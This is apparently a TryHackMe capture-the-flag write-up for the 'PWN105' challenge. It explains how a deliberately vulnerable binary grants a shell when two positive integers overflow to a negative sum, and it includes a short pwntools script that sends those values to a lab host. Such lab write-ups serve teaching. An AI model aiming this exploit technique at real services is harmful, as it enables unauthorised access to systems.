THM - PWN 101 - Integer Overflow (PWN105)
Gathering information
Program behaviour
Program takes 2 integers and sums it.
Binary security
Binary seems to be well protected.
Stack canaries are enabled, non-executable bit is set and even there is address randomization.
Reversing binary
Functions
Disassembling main()
Below part of disassembled code is responsible for taking input from user and adding integers.
Below part is very interesting, when the result of adding operation is negative (and entered values are positive) we jump to 0x1384
address, where we get shell.
Exploitation (Proof Of Concept)
To obtain negative value from adding two positive values we need to overflow the interger. For example int
type has the range [-2147483648 to 2147483647], so we can try to add 2147483647 and 1.
from pwn import *
process = remote('10.10.165.139', '9005')
process.recv()
process.sendline("2147483647")
process.recv()
process.sendline("1")
process.interactive()
We have successfully exploited integer overflow.